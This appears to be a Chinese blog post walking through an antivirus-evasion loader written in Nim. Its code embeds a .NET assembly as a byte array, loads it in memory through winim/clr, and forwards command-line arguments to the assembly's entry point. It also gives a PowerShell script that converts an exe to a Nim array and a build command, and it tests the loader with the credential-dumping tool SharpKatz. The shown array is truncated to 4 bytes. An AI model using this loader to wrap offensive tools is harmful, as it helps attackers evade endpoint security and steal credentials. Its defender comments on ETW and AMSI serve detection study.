Nim套娃加载.NET程序集
VSole2021-08-28 23:22:14
简介
使用OffensiveNim绕过常见杀软。
Start the game
主要用到的库是 winim（这里用的是它的 winim/clr 模块）。
import winim/clr
import sugar
import strformat

# The .NET assembly to run, embedded as raw bytes (the PowerShell converter
# further down emits exactly this `var buf: array[N, byte] = [byte 0x..]` form).
# Just pops a message box... or does it? ;)
# NOTE: as reproduced in this post the initializer lists only 4 of the 4608
# declared elements, so the listing will not compile until the full array
# produced by the converter is pasted in.
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]

# Print every CLR runtime version winim can find on this host.
echo "[*] Installed .NET versions"
for v in clrVersions():
    echo fmt" \--- {v}"

echo ""
echo ""

# Load the assembly from the in-memory buffer into the CLR hosted by this
# process; sugar.dump echoes the expression name together with its value.
# Defender note: the Nim wrapper only changes what sits on disk. An unmanaged
# process that hosts the CLR and loads an assembly from a byte buffer is still
# observable through CLR ETW events and, on .NET Framework 4.8 and later,
# presumably through the AMSI scan the runtime applies to byte[] assembly loads.
var assembly = load(buf)
dump assembly

# The managed entry point takes a string[]; the args are wrapped as one
# VT_BSTR array which is itself passed as the single Invoke argument.
var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
作者提供了一个 PowerShell 脚本，将 exe 转为符合 Nim 语法的 byte 数组。
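# Helper: read one file as raw bytes and write it out as a Nim array literal.
# Both branches of CSharpToNimByteArray used to carry a copy of this code;
# keeping it in one place means they cannot drift apart.
function ConvertTo-NimByteArrayFile {
    Param (
        [string] $Path,
        [string] $OutFile
    )
    # `-Encoding Byte` exists only in Windows PowerShell 5.x; PowerShell 6+
    # replaced it with -AsByteStream, so choose by the running major version.
    if ($PSVersionTable.PSVersion.Major -ge 6) {
        [byte[]] $hex = Get-Content -AsByteStream -Path $Path
    }
    else {
        [byte[]] $hex = Get-Content -Encoding Byte -Path $Path
    }
    # An empty file would otherwise produce `array[0, byte] = [byte 0x]`,
    # which is not valid Nim; fail loudly instead of writing garbage.
    if ($hex.Length -eq 0) {
        throw "File '$Path' is empty; nothing to convert."
    }
    # Each byte becomes "HH"; joining on ",0x" and prefixing "0x" gives
    # 0xHH,0xHH,... which is what the Nim `[byte 0x..]` literal expects.
    $hexString = ($hex | ForEach-Object ToString X2) -join ',0x'
    $Results = "var buf: array[" + $hex.Length + ", byte] = [byte 0x" + $hexString + "]"
    $Results | Out-File $OutFile
}

function CSharpToNimByteArray {
    <#
    .SYNOPSIS
    Writes a file's bytes as a Nim `array[N, byte]` literal next to the input.

    .DESCRIPTION
    Reads every byte of the input file (or of each file directly inside the
    folder when -folder is given) and writes
    `var buf: array[N, byte] = [byte 0x..,0x..]` to "<input>NimByteArray.txt"
    in the same location. Progress messages go to the host, not the pipeline.

    .PARAMETER inputfile
    Path of the file to convert, or of a folder of files when -folder is set.

    .PARAMETER folder
    Treat inputfile as a directory and convert every file directly inside it
    (subdirectories are not descended into).

    .OUTPUTS
    None. Results are written to disk.
    #>
    Param (
        [string] $inputfile,
        [switch] $folder
    )

    if ($folder) {
        # -File skips subdirectories; each entry is converted on its own.
        $Files = Get-ChildItem -Path $inputfile -File
        foreach ($file in $Files) {
            Write-Host "Converting $($file.FullName)"
            $outfile = $file.FullName + "NimByteArray.txt"
            ConvertTo-NimByteArrayFile -Path $file.FullName -OutFile $outfile
        }
        Write-Host -ForegroundColor yellow "Results Written to the same folder"
    }
    else {
        Write-Host "Converting $inputfile"
        $outfile = $inputfile + "NimByteArray.txt"
        ConvertTo-NimByteArrayFile -Path $inputfile -OutFile $outfile
        Write-Host "Result Written to $outfile"
    }
}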
测试SharpKatz
体积有点大。
编译
# Build a 64-bit Windows console binary. -d=mingw selects the MinGW toolchain,
# which is what lets this be compiled from a non-Windows host; --cpu=amd64
# fixes the target architecture regardless of the build machine.
nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nim
Bingo
体积只有800k。
现在还没法传入自定义参数，源码修改后如下：
import winim/clr
import sugar
import strformat
import os

# The .NET assembly to run, embedded as raw bytes (output of the converter
# script above). Just pops a message box... or does it? ;)
# NOTE: as reproduced here only 4 of the 4608 declared elements are listed,
# so the full array must be pasted in before this compiles.
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]

# Print every CLR runtime version winim can find on this host.
echo "[*] Installed .NET versions"
for v in clrVersions():
    echo fmt" \--- {v}"

echo ""
echo ""

# Load the assembly from memory into the CLR hosted by this process and
# echo its value via sugar.dump. The in-memory load itself is still visible
# to CLR ETW tracing (and presumably to the runtime's AMSI hook on
# .NET Framework 4.8+); only the on-disk artefact differs from the original.
var assembly = load(buf)
dump assembly

# Collect this program's own command-line arguments (index 0 is the program
# name, so start at 1) and forward them unchanged to the managed Main.
# os.commandLineParams() returns the same seq in one call.
var cmd: seq[string]
var i = 1
while i <= paramCount():
    cmd.add(paramStr(i))
    inc(i)
echo cmd

# With no arguments `cmd` is empty, so unlike the first version an empty
# VT_BSTR array is passed rather than [""] — whether toCLRVariant accepts
# an empty seq is not shown here; verify on a run with no parameters.
var arr = toCLRVariant(cmd, VT_BSTR)
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
